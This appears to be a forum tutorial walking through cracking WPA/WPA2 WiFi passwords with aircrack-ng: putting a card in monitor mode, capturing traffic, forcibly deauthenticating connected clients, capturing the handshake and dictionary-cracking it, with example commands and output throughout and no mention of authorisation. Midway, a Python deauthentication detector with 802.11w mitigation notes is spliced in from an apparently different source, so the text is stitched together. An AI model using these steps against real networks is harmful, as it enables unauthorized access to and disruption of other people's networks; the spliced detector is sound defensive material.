Cracking WPA WiFi

Cracking WPA WiFi using the Kali Linux or BackTrack operating systems. Both come with the needed tools pre-installed. All you have to do is open up your terminal and look up any tool's usage.

This small, simple guide is for those who want to know some basics. You will need to be on a Linux OS for this, preferably Kali Linux or at least a BackTrack distro. If you don't have either of those, you will need to install the software.

Install software:
sudo apt-get install aircrack-ng # WPA/WPA2 cracking

# Anything with a hash (‘#’) we will not type as code, they will just be comments.

# In Terminal/konsole… :

ifconfig # Displays the list of network adapters.

# You want to get the name of your wireless card. It should be something like wlan0 or eth1;
# it is unlikely to be ‘lo’ or ‘eth0’. If you do not know what your network card device is named,
# use Google to help you find out.

# Command 1:

airmon-ng start (name of wireless card)

# EG: airmon-ng start wlan0

# You should see something saying “(monitor mode enabled on mon0)”.
# If you don’t see that, or there is an error (not a warning), then you did something wrong.
# You can check it’s working by typing “ifconfig” again, this time looking for ‘mon0’.
# If you have ‘mon0’ you have completed the task above.

# Command 2:

airodump-ng -i mon0

# This will present you with a list of all the wireless networks; under ‘ESSID’ you can see the
# name of the network. It should look something like this:

# 00:11:22:33:44:55 -35 300 200 0 11 54e WPA2 CCMP PSK Wireless_network_ESSID

# You want to make sure the network you are attacking has ‘WPA’ or ‘WPA2’, as this guide
# only shows you how to crack that encryption type.

# You then want to copy the BSSID, in this case it’s ’00:11:22:33:44:55’.
# You also want to keep note of what ‘CH’ (Channel) it is on, in this case it’s ’11’.

# Command 3:

airodump-ng -i mon0 --bssid (BSSID) -c (Channel) -w (any filename)

# EG: airodump-ng -i mon0 --bssid 00:11:22:33:44:55 -c 11 -w capture1 --ignore-negative-one

# Leave this running for a while. For the attack to be successful and for us to proceed,
# there will need to be devices connected to the network that we are attacking.
# We will know there are ‘clients’ (devices) on this network when one or more entries
# show up under the ‘STATION’ heading. Make sure there is also a ‘BSSID’ next to the
# station. Everything should look something like this:

# CH 11 ][ Elapsed: 1 mins ][ 2014-02-28 20:20
# BSSID   PWR   RXQ   Beacons   #Data,  #/s   CH   MB  ENC   CIPHER   AUTH   ESSID
# 00:11:22:33:44:55  -35  100  20  60  30  11  54e  WPA2  CCMP  PSK  Wireless_network_ESSID
# BSSID    STATION    PWR  Rate   Lost    Frames  Probe
# 00:11:22:33:44:55   AA:BB:CC:DD:EE:FF    0  12e-1  0  105   -

# There is no way I can make that all line up because HF removes multiple spaces so deal with it…

# So once you are sure there is a ‘client’ connected to the network, we need to de-auth them.
# In a new Terminal window (keeping the previous one open) type:

# Command 4:

aireplay-ng -0 1 -a (BSSID) -c (client's Station) mon0 --ignore-negative-one

# EG: aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

# After executing this command, go back to the other Terminal window and check if we captured
# a handshake. At the top, to the right of the date/time (ie: ‘2014-03-01 12:25’), we will see:

# 2014-03-01 12:25 ][ WPA handshake: 00:11:22:33:44:55

# You may need to repeat Command 4 with different clients (or the same one) until you get a handshake.
# You can also use Command 4 without specifying the client (the ‘-c AA:BB:CC:DD:EE:FF’ part); by removing
# this part there is still a chance of deauthing a client, but it is less likely…
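From the defender's side, the step above is exactly the traffic a wireless IDS looks for: a burst of deauthentication or disassociation frames aimed at one BSSID. The following Python is an added example, not part of this guide or of the aircrack-ng project, that parses raw 802.11 management frame headers, keeps a sliding time window of teardown frames per BSSID, and raises an alert when the count in the window crosses a threshold. The frames, addresses, timestamps and threshold are constructed for illustration (the MACs reuse the guide's placeholder values), and the parser assumes plain 802.11 frames with no radiotap header in front of them.

```python
import struct
from collections import defaultdict, deque

# First byte of the 802.11 Frame Control field for the two management
# subtypes that tear down a client's session (type 0, subtypes 12 and 10).
DEAUTH_FC0 = 0xC0     # deauthentication
DISASSOC_FC0 = 0xA0   # disassociation
BEACON_FC0 = 0x80     # beacon (type 0, subtype 8); used here only as "not interesting"

# Sample addresses reusing the guide's placeholder values (constructed, not real devices).
AP = "00:11:22:33:44:55"
CLIENT = "aa:bb:cc:dd:ee:ff"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def build_frame(fc0, dst, src, bssid, reason, seq=0):
    """Build a minimal 802.11 management frame (constructed test data, no radiotap header)."""
    header = (struct.pack("<BBH", fc0, 0, 0)        # FC byte 0, FC flags, duration
              + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
              + struct.pack("<H", seq << 4))        # sequence control
    return header + struct.pack("<H", reason)       # body: 2-byte reason code


def parse_mgmt_frame(frame):
    """Return (kind, dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26:
        return None
    if frame[0] == DEAUTH_FC0:
        kind = "deauth"
    elif frame[0] == DISASSOC_FC0:
        kind = "disassoc"
    else:
        return None
    # addr1 = receiver, addr2 = transmitter, addr3 = BSSID; reason code follows the 24-byte header
    dst, src, bssid = mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])
    reason = struct.unpack_from("<H", frame, 24)[0]
    return kind, dst, src, bssid, reason


class DeauthDetector:
    """Alert when a BSSID sees `threshold` or more deauth/disassoc frames within `window_s` seconds."""

    def __init__(self, threshold=5, window_s=10.0):
        self.threshold = threshold
        self.window_s = window_s
        self.events = defaultdict(deque)   # bssid -> timestamps of recent teardown frames
        self.alerted = set()               # one alert per BSSID per run

    def feed(self, ts, frame):
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            return None
        kind, dst, src, bssid, reason = parsed
        recent = self.events[bssid]
        recent.append(ts)
        while recent and ts - recent[0] > self.window_s:   # slide the window forward
            recent.popleft()
        if len(recent) >= self.threshold and bssid not in self.alerted:
            self.alerted.add(bssid)
            return (f"ALERT bssid={bssid}: {len(recent)} deauth/disassoc frames within "
                    f"{self.window_s:.0f}s (latest {kind} {src} -> {dst}, reason={reason})")
        return None


def run_detector(capture, threshold=5, window_s=10.0):
    """Feed (timestamp, frame_bytes) pairs through the detector; return the alerts raised."""
    det = DeauthDetector(threshold, window_s)
    alerts = []
    for ts, frame in capture:
        alert = det.feed(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed capture: a beacon, one ordinary deauth (reason 3 = station is leaving),
# then a burst of eight deauths in under two seconds, alternating broadcast and targeted.
SAMPLE_CAPTURE = [
    (0.0, build_frame(BEACON_FC0, BROADCAST, AP, AP, 0, 1)),
    (30.0, build_frame(DEAUTH_FC0, CLIENT, AP, AP, 3, 2)),
] + [
    (100.0 + i * 0.2,
     build_frame(DEAUTH_FC0, BROADCAST if i % 2 == 0 else CLIENT, AP, AP, 7, 10 + i))
    for i in range(8)
]

if __name__ == "__main__":
    for line in run_detector(SAMPLE_CAPTURE):
        print(line)
```

The detector keys on addr3 (the BSSID) rather than on the transmitter address, because a forged deauth carries whatever source address the sender chooses; the BSSID is what ties the burst to the network being hit. A single deauth every now and then is normal (clients roam and leave), which is why the check is a count in a window and not a match on a single frame. On the mitigation side, access points and clients that support 802.11w (Protected Management Frames) authenticate deauth and disassoc frames, so an unauthenticated forged one is simply dropped.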

# So now you have captured the WPA handshake, we can begin cracking it (recovering the passphrase).
# You can stop ‘airodump-ng’ by pressing ‘ctrl + c’ and take your wireless card out of monitor mode:

# Command 5:

airmon-ng stop mon0

# You no longer actually need to be in the same area as the access point; you can go home if you want.

# For this next step you probably want a strong computer (powerful CPU). If you will just use the same computer,
# that’s ok too. If you do decide to use another computer you will need to install ‘aircrack-ng’, which is available on
# any platform…

# You are also going to need a wordlist and a lot of free time (or be able to leave the computer running).
# I’d recommend a wordlist from CrackStation.
# I commonly use the 247MB (648MB expanded) download, but if you have a good computer and 42-odd
# hours to spare you can use the 4.2GB (15GB expanded) one.

# Command 6:

aircrack-ng -w (wordlist) -b (bssid) (capture file)

# EG: aircrack-ng -w Downloads/crackstation-human-only.txt -b 00:11:22:33:44:55 captures/capture1.ivs

# Note: the ‘-b 00:11:22:33:44:55’ is optional; if you don’t specify it, it will just give you a list to choose
# from, likely only the one you attacked. If you did not successfully capture the handshake it will say
# “Got no data packets from target network!”

# If everything worked you should be presented with something like this:

#  Aircrack-ng 1.2 beta2
#  [00:00:05] 205 keys tested (500 k/s)
#  Current passphrase: potato
#  Master Key    : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#                  00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#  Transient Key : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#                  00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#                  00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#                  00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#  EAPOL HMAC    : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF

# After letting this run through for ages you should see:

# KEY FOUND! [ password123 ]

# And now you can access the network with the WPA password.